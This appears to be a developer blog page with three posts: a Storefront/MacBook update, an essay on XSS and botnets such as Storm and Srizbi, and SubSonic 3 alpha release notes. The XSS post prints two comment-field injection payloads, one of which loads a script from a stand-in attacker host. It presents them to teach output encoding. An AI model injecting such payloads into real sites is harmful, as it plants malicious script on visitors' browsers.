Sponsored By Aspose - File Format APIs for .NET

Aspose are the market leader of .NET APIs for file business formats – natively work with DOCX, XLSX, PPT, PDF, MSG, MPP, images formats and many more!

Where’s MVC Storefront?

A lot of people have been asking about the Storefront and whether I’ve abandoned it with all that’s gone on with Oxite, etc. The short answer is no – I haven’t. And believe it or not, Oxite didn’t impact anything with respect for the storefront at all. I promise!

The deal is that I’m on vacation right now for 2.5 weeks or so in Portland (LOVE IT here). While on vacation I’m stealing time to work on stuff – mainly our forthcoming book. The rest of the time I’m hanging with my family and trying not to freeze to death. People tell me we’re below the Arctic Circle, but I think Portland may actually be somewhere north of Juneau, and they move it around just like in Lost.

The good news is that I have a new one of these things:

I really can’t say enough about it. This may sound completely silly, but the thing that sold me was the construction of the case – it’s milled from a solid piece of metal. If you notice in the picture – there are no seams. The display is covered completely with a protective glass – this is huge if you have kids that like to poke at Diego and Dora on the screen. It also makes it very easy to clean.

It’s literally about twice as fast as my 2 yr. old Mac Book – the main reason being the Core 2 Duo processors and DDR3 RAM (which is a big step up from 2 years ago). The price tag is still pretty spendy – the base Mac Book Pro comes in at $1990, the upgraded version is $2499. The good news, however, is that the upgraded version has a bigger hard drive and fills all the RAM slots so you don’t need to buy more RAM – it’s already maxxed at 4G.

To be honest I feel completely lame for buying this thing with the economy the way it is. The truth of it, however, is that I will be travelling a lot in the coming year and my wife has sort of taken over my old MBP. We could share – sure – and we probably should have. I feel a bit like I’m fiddling while Rome’s aflame. It’s my job, however, and there are things that you can categorize as luxury, as equipment, and as both. I happen to be very high maintenance when it comes to equipment :) and buying a computer every 2 years really is not that crazy.

A Word About Rails
Macs come with Rails installed (1.2.6 I believe) as well as Ruby (1.8.6). I usually wipe it completely out and start from scratch (I leave Ruby though) as I never trust factory installs with anything.

It took me about 15 minutes to download and install the latest Rails version (2.2.3) as well as update Gems and install TextMate. I hadn’t played with Rails in a while and it was a lot of fun to see what’s come of the framework in the last year and a half. The use of SQL Lite is an interesting one – not too sure what I think of it but it made the experience a lot more simple I must say.

The reason I bring this up is simply to say that I’m not losing site of the type of simplicity I love. I’ve ventured deep into DDD land of late (as well as some other areas) and messed around with the more “ornate” and “baroque” sides of development. Hopefully you won’t read an opinion in there – I’ve learned a WHOLE LOT and I have to say that I’m 100 times the geek I was before I started.

The thing I’m getting at here is that I love simple things. Truly. It’s one of the reasons I really dig the MacBook: the design is soooo clean and simple, the buttons are just the right size, and there isn’t a lot of “engineering filigree” all over the thing. It’s quite Zen.

To bring us back to where I started (with the Storefront) – it’s always been my focus to keep it simple yet powerful. There is some work left to do with my refactoring, but I’m taking some time away right now to regenerate mind, body, and spirit and hopefully my journey will benefit you in the end.

Posted in Blather | 8 Comments

The Perfect Storm Botnet

I’m sure you’ve been told, numerous times no doubt, about Cross-site scripting and that it’s bad. I think, for most developers, the only fear they have of XSS is looking foolish when someone hacks their site, shredding the layout of their pages and sending popups all over the screen. At least that’s what I thought a while back. And it’s all because I didn’t quite get the depth of the soul-corroding evil that uses XSS as a primary attack point. Nor how pervasive it is.

Come with me, friends, on a Dante’s journey into the black, horrible, dirty depths of the Botnet -  The Hordes of zombie drone computers on the internet that work to Enlarge your Penis, sell you Cialis, and melt your face.

An Inconvenient Zombie Death Army
I was studying up today on a book I’m writing (the security chapter) and I decided to devote the afternoon to  getting to know more about spam, spammers, and the viruses they write. I know that most machines, when they get infected with a trojan or worm, become part of a larger network which coordinates distributed sending of nasty email. What I didn’t know just how evil these things really are (from Wikipedia):

The [Storm] botnet reportedly is powerful enough as of September 2007 to force entire countries off the Internet, and is estimated to be capable of executing more instructions per second than some of the world’s top supercomputers. However, it is not a completely accurate comparison, according to security analyst James Turner, who said that comparing a botnet to a supercomputer is like comparing an army of snipers to a nuclear weapon

If that made you catch your breath a bit, read on…

At certain points in time, the Storm worm used to spread the botnet has attempted to release hundreds or thousands of versions of itself onto the Internet, in a concentrated attempt to overwhelm the defenses of anti-virus and malware security firms. According to Joshua Corman, an IBM security researcher, "This is the first time that I can remember ever seeing researchers who were actually afraid of investigating an exploit."

It’s one of those things that you really don’t want to know about; but it’s really hard to pull yourself out once you’re in. This rat-hole goes very, very deep. But is it all real? Or is it just some hyped up marketing prattle to get you to buy an Antivirus? You decide for yourself.


The Picture of Evil: The Srizbi Trojan
Srizbi is only a few years old and is most likely a mutation of one of its precursors. It’s a very small trojan, but it packs one hell of a punch (emphasis mine):

Apart from having an efficient spam engine, the trojan is also very capable in hiding itself from both the user and the system itself, including any products designed to remove the trojan from the system. The trojan itself is fully executed in kernel mode and has been noted to employ rootkit-like technologies to prevent any form of detection. By patching the NTFS file system drivers, the trojan will make its files invisible for both the operating system and any human user utilizing the system. The trojan is also capable of hiding network traffic it generates by directly attaching NDIS and TCP/IP drivers to its own process, a feature currently unique for this trojan. This procedure has been proved to allow the trojan to bypass both firewall and sniffer protection on the system.

Once the bot is in place and operational, it will contact one of the hardcoded servers from a list it carries with it. This server will then supply the bot with a zip file containing a number of files required by the bot to start its spamming business. The following files have been identified to be downloaded:

  1. 000_data2 – mail server domains
  2. 001_ncommall – list of names
  3. 002_senderna – list of possible sender names
  4. 003_sendersu – list of possible sender surnames
  5. config – Main spam configuration file
  6. message – HTML message to spam
  7. mlist – Recipients mail addresses
  8. mxdata – MX record data

When these files have been received, the bot will first initialize a software routine which allows it to remove files critical for revealing spam and rootkit applications. After this procedure is done, the trojan will then start sending out the spam message it has received from the control server.

This trojan actually patches the NTFS file system in a sort of "Jedi mindtrick" which tells it "I am not the trojan you’re looking for". Not only that, it’s able to talk DIRECTLY to the TCP/IP drivers, and hide in their cargo hold on the way out of the server bay. That, friends, is nutso.

The most insidious part of all of this is that Srizbi is written using this toolset called MPack, which is a PHP-based, commercially available malware kit. Yes, that’s correct – it’s a malware SDK:

Unusual for such kits, MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits. Modules are sold by the developers containing new exploits. These cost between $50 and $150 US depending on how severe the exploit is. The developers also charge to make the scripts and executables undetectable by antivirus software.

This malware kit is especially effective at exploiting XSS holes in websites that aren’t entirely prepared for XSS:

The server-side software in the kit is able to customize attacks to a variety of web browsers including Microsoft Internet Explorer, Mozilla Firefox and Opera. MPack generally works by being loaded in an IFrame attached to the bottom of a defaced website. When a user visits the page, MPack sends a script that loads in the IFrame and determines if any vulnerabilities in the browser or operating system can be exploited. If it finds any, it will exploit them and store various statistics for future reference.

Included with the server is a management console, which allows the attacker deploying the software to view statistics about the computers that have been infected, including what web browsers they were using and what countries their connections originated from.

In fact, it’s been estimated that if it weren’t for XSS, propagation of spam trojans like Srizbi would drop dramatically. As it stands, the network propagates itself using "Stupid Theme", wherein people are sent emails that say "we have video of you naked, click here". The subject matter changes (from naked celebrities to instant fortunes) but occasionally people end up clicking on them, get sent to a compromised site, then BAM, another drone is born.

Evil’s Super Evil Twin: The Storm Worm
The Storm worm is like Srizbi, but just a tad scarier. It’s spread by a system of servers that utilize a DNS-switching routine called "fast flux". Fast flux involves using  one or more zombie hosts as a DNS proxy (singular or in series), and the de-registering/re-registering address records and aliases up to twice a minute. This server army is literally impossible to locate and therefore makes nytimes_wo_web_zombiethe Storm botnet sort of unstoppable.

The thing that sets the Storm botnet (the fleet of zombie computers infected with the worm) apart is that it’s actually capable of defending itself – on its own:

The Storm botnet was observed to be defending itself, and attacking computer systems that scanned for Storm virus-infected computer systems online. The botnet will defend itself with DDoS counter-attacks, to maintain its own internal integrity. At certain points in time, the Storm worm used to spread the botnet has attempted to release hundreds or thousands of versions of itself onto the Internet, in a concentrated attempt to overwhelm the defenses of anti-virus and malware security firms.

Mess with the worm, get the DDoS horns. More from Joshua Corman:

"If you try to attach a debugger, or query sites it’s reporting into, it knows and punishes you instantaneously. [Over at] SecureWorks, a chunk of it DDoS-ed a researcher off the network. Every time I hear of an investigator trying to investigate, they’re automatically punished. It knows it’s being investigated, and it punishes them. It fights back," Corman said.

The crazy part about all of this is that no one’s really sure  just how big this zombie death army is, after all it doesn’t want to be seen, and doesn’t want you know it’s there. These guys make money on a very weird scale: only 1 in 10 million spam emails sent results in payment – therefore to make more money you need to send more email. If you’re busy being evil, you’re not sending mail. Moreover you’re exposing yourself and your operation – it’s best to remain silent and hidden, growing your Death Army one machine at a time:

According to Matt Sergeant, chief anti-spam technologist at MessageLabs, "In terms of power, [the botnet] utterly blows the supercomputers away. If you add up all 500 of the top supercomputers, it blows them all away with just 2 million of its machines. It’s very frightening that criminals have access to that much computing power, but there’s not much we can do about it." It is estimated that only 10%-20% of the total capacity and power of the Storm botnet is currently being used.

Spam is organized, sophisticated, and utterly morose and evil. It goes beyond annoying when you consider the power these guys have at their fingertips, and that we just can’t catch them. But there is something you can do, and it’s so small and so very, very simple. In fact it’s only 10 little letters:


Why, you may ask? Because a primary vector of release for these things is from script-injection, where the bad guys use your site to link off to a zombie host, which contains the nasty-script that wants to eat your computer’s face. You can do something about this – and you should!

You Are Not Prepared
Over the last year, people have been very quick to point out that many of the samples I’ve created have been vulnerable to XSS. Sheepishly I’ve made the fix, each time, kicking myself for being lame. We didn’t need to worry about this so much with Web Forms, but with MVC and hand-rolling HTML, the issue is become greater, and more awareness is needed.

Yesterday as I was reading over Oxite’s source code with Damien Guard (this is not to pick on them – just an illustration how easy it is to let stuff slip), I entered this in to the URL field of the comments:

"><script>alert("ha ha ha I suck");</script><a href="

Update This has been fixed at MIX online – please don’t bother trying.

And wouldn’t ya know it – it worked perfectly – popping up a really annoying message every time I opened the page up. This happened every time, because the database saved the comment, then planted my nasty script every time the page loaded – this is called "passive script injection".

Now if I was evil, I could have done something like this (of course this URL is fake):

"></a><script src=http://srizbitrojan.mynastyninjasite.com/spreadbadness.js></script> <a href="

This is the comment author’s URL, and his name will be linkable even if you have this script line in there. If I had my hands on MPack, who knows what kind of stuff I could have done!

To get around this, all the developer needed to do was to

  1. Be aware of the evil that lies behind XSS, and why it wants to melt your face and eat your children and
  2. Use Html.Encode() on ANYTHING that is output on a page.

Please, for the children, encode your output.

Further Reading

I had a really good time investigating the chapter I’m writing, and if you’re interested in any of the above, here are some links to get you started. It’s good stuff to know, but you’ll get dirty along the way:

Posted in XSS | 17 Comments

SubSonic 3 Alpha Updated

Many thanks to the folks who downloaded and ran the alpha. As I figured, I missed a few things. The good news is that I’ve fixed them, and 99% of them were with the templates – which is good news because it means that you could have fixed them if you had to :).

But first – I’d like to say a big HELLO! to all the folks at CodeBetter, because as of today, I will be cross-posting my blog there. Indeed it’s quite an honor and many thanks to Jeremy Miller for inviting me!

Here’s the updated list of bits:

  1. Fixed an SP bug that would result in the command type not getting set properly
  2. Restructured and re-organized the namespacing
  3. Renamed the DLL to SubSonic.Core, rather than SubSonic (forgot to do that earlier)
  4. Fixed up the _Settings.tt template to more accurately convey just WTF it is you’re setting
  5. Fixed a foreign-key naming bug which allowed spaces through
  6. Fixed a bug with self-referencing tables, wherein a child property could wiggle through and end up having the same name as the parent
  7. Fixed a commenting issue in the Repositories, which VS didn’t like

You can download the source, if you like, or grab the download here (DLL plus templates). If you have a question – you can leave a note here or (preferably) ask it here, on our mailing list.

Setup Walkthrough
I was asked on the comments of my last post for a walkthrough – so here it is. Setting up SubSonic 3:

1) Download the bits.

2) Open Zip file, and put on your hard drive somewhere

3) Create a project and add an app/web.config file

4) Add a VALID connection string to your favorite DB

5) Edit the _Settings.tt file, letting it know the name of your connection string and whatever Namespace you want for your generated objects:


6) Drag the _Generated file into your project – put it where you like


7) You’re done. Go grab a soda, then start coding.

If you want more information about how to use what’s generated for you, read more here and also read up here.

Many thanks to the folks testing!

Posted in SubSonic | 6 Comments